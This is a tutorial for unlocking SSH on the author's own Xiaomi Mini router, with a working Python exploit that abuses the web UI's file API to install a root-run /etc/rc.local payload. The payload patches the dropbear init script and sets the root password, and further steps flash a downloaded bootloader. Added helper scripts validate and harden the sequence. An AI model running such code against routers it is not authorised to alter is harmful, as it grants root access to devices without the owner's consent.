Xiaomi Mini SSH Unlock Tutorial

By | 2018-11-27

This tutorial is based on: http://coolrc.me/2016/07/23/23131543/

Some of the original author's explanations are hard for beginners to follow, which is why this version exists. Corrections are welcome!

1. Preparation
1) A computer running Ubuntu or another Linux distribution [I recommend Ubuntu]
2) The older Xiaomi Mini developer-edition firmware [2.7.11 developer build]
3) The Xiaomi Mini breed bootloader (the "unbrickable" bootloader), so that later flashing is worry-free.
Breed can also be downloaded directly on the router once SSH is enabled.

2. On Ubuntu, do the following
1) Install Python: apt-get install python3 python3-pip, then pip3 install requests (the script below imports the requests library, which is not part of the standard library)
2) Create a file /home/mini.py with the following content:

#!/usr/bin/env python3
# mini.py: pushes the local 'payload' file onto the router and installs it as
# /etc/rc.local through the web UI's file-management API. The stok session
# value is the only credential it needs.
import requests
import time

ROUTER = 'http://192.168.31.1'

def main():
    Session = input("Paste your session here: ")
    #Session = '1387acc0547bc5188bc22bb811b2db9c'
    print('++++++++++++++++++++++++++++++++++++++++++++++++++')
    print('+          MiRouter OpenSSH exploit              +')
    print('+    Codez by dadadazhiliao,QQ:271607603         +')
    print('++++++++++++++++++++++++++++++++++++++++++++++++++')
    print("Prepare hacking your MiRouter")
    time.sleep(3)
    # 1. upload 'payload' to the USB disk (/extdisks/sda1 is the mount point
    #    of a USB stick plugged into the router)
    upload(Session, 'payload', '/extdisks/sda1')
    for i in range(1, 10):
        print('>' * i, 'payload on the way', end='\r')
        time.sleep(0.3)
    # 2. keep the stock rc.local as a backup
    filemv(Session, '/etc/rc.local', '/etc/rc.local.bak')
    for i in range(11, 15):
        print('>' * i, 'exploit it                ', end='\r')
        time.sleep(0.3)
    # 3. copy the payload from the USB disk into /etc
    filecp(Session, '/extdisks/sda1/payload', '/etc/')
    for i in range(16, 20):
        print('>' * i, 'exploit it                ', end='\r')
        time.sleep(0.3)
    # 4. rename it to /etc/rc.local, which runs as root at every boot
    filemv(Session, '/etc/payload', '/etc/rc.local')
    for i in range(21, 25):
        print('>' * i, 'exploit it                ', end='\r')
        time.sleep(0.3)
    # 5. remove the copy left on the USB disk
    filerm(Session, '/extdisks/sda1/payload')
    print('>' * 26, 'done                ')
    print('Reboot your Router and get the ssh,enjoy :)')
    #filerm(Session, '/userdisk/data/payload')

def upload(Session, file, fpath):
    # the stok value doubles as the 'secret' parameter of the upload endpoint
    MiUrl = ROUTER + '/upload?stok=' + Session + '&secret=' + Session + '&target=' + fpath + '&targetRootPath=/'
    with open(file, 'rb') as fh:
        files = {'file': ('payload', fh, 'application/octet-stream', {'Expires': '0'})}
        req = requests.post(url=MiUrl, files=files, timeout=10)
    #print (req.content)

def datacenter(Session, body):
    # every file operation goes through the same endpoint; 'payload' is a JSON
    # string naming the operation ('api') and carrying the session as 'token'
    MiUrl = ROUTER + '/cgi-bin/luci/;stok=' + Session + '/api/xqdatacenter/request'
    req = requests.post(MiUrl, data={"payload": body}, timeout=10)
    #print (req.content)
    return req

def filemv(Session, mfile, dist):
    # api 50: move/rename
    datacenter(Session, '{"api":50,"source":"' + mfile + '","target":"' + dist + '","token":"' + Session + '"}')

def filecp(Session, mfile, distdir):
    # api 4: copy into a directory
    datacenter(Session, '{"api":4,"source":"' + mfile + '","target":"' + distdir + '","token":"' + Session + '"}')

def filerm(Session, dfile):
    # api 2: delete
    datacenter(Session, '{"api":2,"path":"' + dfile + '","token":"' + Session + '"}')

if __name__ == '__main__':
    main()

Then make it executable: chmod +x mini.py

Next, create a file named payload with the following content:

# restore phy config
speed=$(uci -q get xiaoqiang.common.WAN_SPEED)
[ -n "$speed" ] && /usr/sbin/phyhelper swan "$speed"
# neutralise the early "return 0" in the dropbear init script that keeps SSH disabled, then start it
sed -i ":x;N;s/if \[.*\; then\n.*return 0\n.*fi/#hehe/;b x" /etc/init.d/dropbear
/etc/init.d/dropbear start
# set the root password (replace 'password' with your router admin password)
pwd=password
(echo $pwd; sleep 1; echo $pwd) | passwd root
exit 0

Replace password with your router's admin password, i.e. the password you use to log in at http://192.168.31.1; the two must match.
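A dry run of the payload's sed line, as an added example (this is not the tutorial's or the original author's code). That sed expression is the step that actually re-enables dropbear, and it runs blind on the router at boot. The script below runs the identical expression through the host's sed against two constructed stand-ins for /etc/init.d/dropbear, since the real file cannot be read before SSH works; the init scripts and the uci key in them are made up for the demonstration.

```python
#!/usr/bin/env python3
"""Dry-run of the payload's sed expression against constructed init scripts.
Added example, not part of the tutorial; the sample scripts are made up."""
import subprocess

# Verbatim from the payload file in the tutorial.
DROPBEAR_SED = r":x;N;s/if \[.*\; then\n.*return 0\n.*fi/#hehe/;b x"

# Constructed sample 1: a single gate that returns early when SSH is disabled.
INIT_SIMPLE = """\
#!/bin/sh /etc/rc.common
START=50

start() {
    if [ "$(uci -q get ssh.server.enabled)" != "1" ]; then
        return 0
    fi
    /usr/sbin/dropbear -p 22
}
"""

# Constructed sample 2: an unrelated 'if [ ... ]; then ... fi' block before the gate.
INIT_WITH_EARLIER_IF = """\
#!/bin/sh /etc/rc.common
START=50

start() {
    if [ -f /etc/dropbear/extra.conf ]; then
        . /etc/dropbear/extra.conf
    fi
    if [ "$(uci -q get ssh.server.enabled)" != "1" ]; then
        return 0
    fi
    /usr/sbin/dropbear -p 22
}
"""

def apply_payload_sed(init_script: str) -> str:
    """Run the payload's sed expression over the text (no -i: nothing on disk is touched)."""
    result = subprocess.run(["sed", DROPBEAR_SED], input=init_script,
                            capture_output=True, text=True, check=True)
    return result.stdout

def gate_removed(patched: str) -> bool:
    """True when the early 'return 0' is gone and the daemon start line survived."""
    return ("return 0" not in patched and "#hehe" in patched
            and "/usr/sbin/dropbear" in patched)

def lines_lost(original: str, patched: str) -> list:
    """Lines of the original that no longer appear after patching."""
    kept = set(patched.splitlines())
    return [line for line in original.splitlines() if line not in kept]

if __name__ == "__main__":
    for name, sample in (("simple", INIT_SIMPLE), ("earlier-if", INIT_WITH_EARLIER_IF)):
        out = apply_payload_sed(sample)
        print(f"[{name}] gate removed: {gate_removed(out)}")
        for line in lines_lost(sample, out):
            print(f"    deleted: {line}")
```

What the second sample shows: the regex is anchored only by "if [" and its ".*" parts are greedy across newlines, so everything from the first "if [ ... ]; then" before the gate up to the gate's "fi" is collapsed into the single "#hehe" line. Dropbear still starts in both samples because its start line follows the gate, but if the real init script has other "if [" blocks inside start(), they go with it.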

3. Flash the 2.7.11 developer firmware
The flashing procedure itself is not covered here; if you do not know how, look up a tutorial. [The original author asks you to restore factory settings and, after flashing the old firmware, to plug in a USB stick. I did neither when I did this, and I don't understand the original author's intent, so judge for yourself!]

After flashing the old firmware you must complete the setup wizard. Then copy down the 32-character value after stok= ; you can find it in the browser address bar, for example:
http://192.168.31.1/cgi-bin/luci/;stok=cc920253aacf785d13c6795b8464dbb7/web/setting/upgrade
The part to copy is the string 'cc920253aacf785d13c6795b8464dbb7'

4. Enabling SSH
On Ubuntu, run:

cd /home
python3 mini.py

Paste your session here: <-- enter the stok value you copied above

The script then runs on its own; on success you will see the following:

++++++++++++++++++++++++++++++++++++++++++++++++++
+          MiRouter OpenSSH exploit              +
+    Codez by dadadazhiliao,QQ:271607603         +
++++++++++++++++++++++++++++++++++++++++++++++++++
Prepare hacking your MiRouter
>>>>>>>>>>>>>>>>>>>>>>>>>> done
Reboot your Router and get the ssh,enjoy :)

Now reboot the router. The root password is the password you put in the payload file in step 2, i.e. the router admin password.
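A fail-fast alternative to running mini.py blind, as an added example (this is not mini.py and not the original author's code). mini.py ignores every reply from the router, so a wrong stok or a failed upload still moves /etc/rc.local away with nothing copied back. This version uses only the standard library, accepts either the bare stok or the whole address-bar URL, posts the same five requests in the same order, and stops at the first step whose reply is not OK, moving rc.local.bak back if it had already been moved. The assumption that a successful reply is JSON with "code": 0 is mine, not something the page states; if the real replies differ, the script stops before touching /etc/rc.local, which is the safe direction.

```python
#!/usr/bin/env python3
"""Fail-fast variant of mini.py's API sequence (added example, not the
tutorial's code).  Checks the stok, checks every reply and stops at the
first failure, undoing the rc.local move if it got that far.
Assumption (not stated on the page): a successful reply is a JSON object
with "code": 0.  Standard library only."""
import json
import re
import sys
import urllib.error
import urllib.parse
import urllib.request
import uuid

ROUTER = "http://192.168.31.1"
USB_DIR = "/extdisks/sda1"      # USB disk mount point, as used by mini.py
FORM = "application/x-www-form-urlencoded"

def extract_stok(text: str) -> str:
    """Accept the bare 32-hex token or the full address-bar URL containing ;stok=..."""
    text = text.strip()
    if re.fullmatch(r"[0-9a-f]{32}", text):
        return text
    m = re.search(r"stok=([0-9a-f]{32})", text)
    if not m:
        raise ValueError("no 32-character hex stok found")
    return m.group(1)

def api_url(stok: str) -> str:
    return f"{ROUTER}/cgi-bin/luci/;stok={stok}/api/xqdatacenter/request"

def datacenter_body(stok: str, api: int, **fields) -> bytes:
    """Form body for xqdatacenter: one 'payload' field holding a JSON string.
    api 50 = move, 4 = copy, 2 = delete (the numbers mini.py uses)."""
    payload = {"api": api, **fields, "token": stok}
    return urllib.parse.urlencode({"payload": json.dumps(payload, separators=(",", ":"))}).encode()

def decode_body(body: bytes) -> dict:
    """Inverse of datacenter_body, for inspecting a planned request."""
    return json.loads(urllib.parse.parse_qs(body.decode())["payload"][0])

def multipart(filename: str, data: bytes):
    """Minimal multipart/form-data encoding for the /upload endpoint."""
    b = uuid.uuid4().hex
    head = (f'--{b}\r\nContent-Disposition: form-data; name="file"; filename="{filename}"\r\n'
            "Content-Type: application/octet-stream\r\n\r\n").encode()
    return f"multipart/form-data; boundary={b}", head + data + f"\r\n--{b}--\r\n".encode()

def plan(stok: str, payload: bytes) -> list:
    """mini.py's five steps, in order, as (label, url, content_type, body)."""
    ctype, up = multipart("payload", payload)
    api = api_url(stok)
    return [
        ("upload payload to USB disk",
         f"{ROUTER}/upload?stok={stok}&secret={stok}&target={USB_DIR}&targetRootPath=/", ctype, up),
        ("back up /etc/rc.local", api, FORM,
         datacenter_body(stok, 50, source="/etc/rc.local", target="/etc/rc.local.bak")),
        ("copy payload into /etc", api, FORM,
         datacenter_body(stok, 4, source=f"{USB_DIR}/payload", target="/etc/")),
        ("install payload as /etc/rc.local", api, FORM,
         datacenter_body(stok, 50, source="/etc/payload", target="/etc/rc.local")),
        ("remove payload from USB disk", api, FORM,
         datacenter_body(stok, 2, path=f"{USB_DIR}/payload")),
    ]

def reply_ok(raw: str) -> bool:
    """Assumed success shape: a JSON object with "code": 0; anything else is failure."""
    try:
        return json.loads(raw).get("code") == 0
    except (ValueError, AttributeError):
        return False

def post(url: str, ctype: str, body: bytes) -> str:
    """POST and return the reply text; a transport error yields non-JSON text (= failure)."""
    req = urllib.request.Request(url, data=body, headers={"Content-Type": ctype})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode(errors="replace")
    except urllib.error.URLError as e:
        return f"transport error: {e}"

def run(stok: str, payload: bytes) -> int:
    """Run the plan, stop at the first failure; returns the number of steps that succeeded."""
    done = 0
    for label, url, ctype, body in plan(stok, payload):
        raw = post(url, ctype, body)
        if not reply_ok(raw):
            print(f"FAILED at '{label}': {raw[:200]}", file=sys.stderr)
            if done in (2, 3):      # rc.local already moved away, new one not installed yet
                back = datacenter_body(stok, 50, source="/etc/rc.local.bak", target="/etc/rc.local")
                ok = reply_ok(post(api_url(stok), FORM, back))
                print("restored /etc/rc.local from backup" if ok else
                      "could not restore /etc/rc.local; put it back before rebooting", file=sys.stderr)
            return done
        done += 1
        print(f"ok: {label}")
    return done

if __name__ == "__main__":
    stok = extract_stok(input("Paste your stok or the full URL here: "))
    with open("payload", "rb") as fh:
        data = fh.read()
    if run(stok, data) == 5:
        print("All steps done; reboot the router and ssh in as root.")
```

Run it from the directory that holds the payload file, exactly as you would run mini.py. If a step fails, the message printed shows the first 200 characters of the router's reply, which is usually enough to tell an expired session from a missing USB disk.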

5. Writing the breed bootloader
Log in to the router with PuTTY or another SSH client [you now have the root password, so you can log in]
Run the following commands (the -r flag makes mtd reboot the router after a successful write):

cd /tmp
wget http://breed.hackpascal.net/breed-mt7620-xiaomi-mini.bin
mtd -r write /tmp/breed-mt7620-xiaomi-mini.bin Bootloader

If you are running PandoraBox or OpenWrt you cannot write breed from there; you must first flash DD-WRT and write breed from within it. Under DD-WRT the command is as follows [run it in the DD-WRT environment, of course]; note that the partition name differs, u-boot here instead of Bootloader:

mtd -r write /tmp/breed-mt7620-xiaomi-mini.bin u-boot
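A pre-flight check for the mtd write, as an added example (not part of the tutorial): the two commands above differ only in the partition name, and naming the wrong one means writing a bootloader into the wrong flash region. The script parses the router's /proc/mtd table, confirms a partition named Bootloader or u-boot exists, and confirms the breed image fits in it, before you type the mtd command. The /proc/mtd sample embedded in the block is made up (the sizes are not the Mini's real layout) and the script name mtdcheck.py is my own; on the real router feed it the real table:

ssh root@192.168.31.1 cat /proc/mtd | python3 mtdcheck.py breed-mt7620-xiaomi-mini.bin

```python
#!/usr/bin/env python3
"""Check /proc/mtd for the bootloader partition before running mtd write.
Added example, not part of the tutorial; the sample table is constructed."""
import re
import sys

# Partition names the tutorial uses: "Bootloader" on the stock firmware, "u-boot" on DD-WRT.
BOOTLOADER_NAMES = ("Bootloader", "u-boot")

# Constructed sample in /proc/mtd's format (hex sizes in bytes); not the Mini's real layout.
SAMPLE_PROC_MTD = """\
dev:    size   erasesize  name
mtd0: 00030000 00010000 "Bootloader"
mtd1: 00010000 00010000 "Config"
mtd2: 00010000 00010000 "Factory"
mtd3: 00fb0000 00010000 "OS1"
"""

def parse_proc_mtd(text: str) -> dict:
    """Map partition name -> (device, size in bytes) from /proc/mtd text."""
    table = {}
    for line in text.splitlines():
        m = re.match(r'(mtd\d+):\s+([0-9a-f]+)\s+([0-9a-f]+)\s+"(.*)"', line)
        if m:
            table[m.group(4)] = (m.group(1), int(m.group(2), 16))
    return table

def find_bootloader(table: dict):
    """Return (name, device, size) of the first known bootloader partition, or None."""
    for name in BOOTLOADER_NAMES:
        if name in table:
            dev, size = table[name]
            return name, dev, size
    return None

def check_image(table: dict, image_len: int):
    """(ok, message): ok only when a known bootloader partition exists and the image fits."""
    found = find_bootloader(table)
    if found is None:
        return False, "no partition named %s; do not run mtd write" % " or ".join(BOOTLOADER_NAMES)
    name, dev, size = found
    if image_len > size:
        return False, f"image is {image_len} bytes but {name} ({dev}) is only {size} bytes"
    return True, f"mtd -r write <image> {name}   # {dev}, {size} bytes, image {image_len} bytes"

if __name__ == "__main__":
    # Read the table from stdin when piped in; fall back to the constructed sample.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_PROC_MTD
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            image_len = len(fh.read())
    else:
        image_len = 0x20000     # placeholder size when no image path is given
    ok, msg = check_image(parse_proc_mtd(text), image_len)
    print(msg)
    sys.exit(0 if ok else 1)
```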


Checking that breed was written successfully
Power off the router, hold the reset button while powering it on, and release reset once the blue LED blinks continuously.
Breed's default IP address is 192.168.1.1; I won't explain the PC-side setup here. If you can't manage that, I doubt you understood the rest of this tutorial either, and I suggest you give it up!!! to avoid unnecessary damage.

End of tutorial!!!
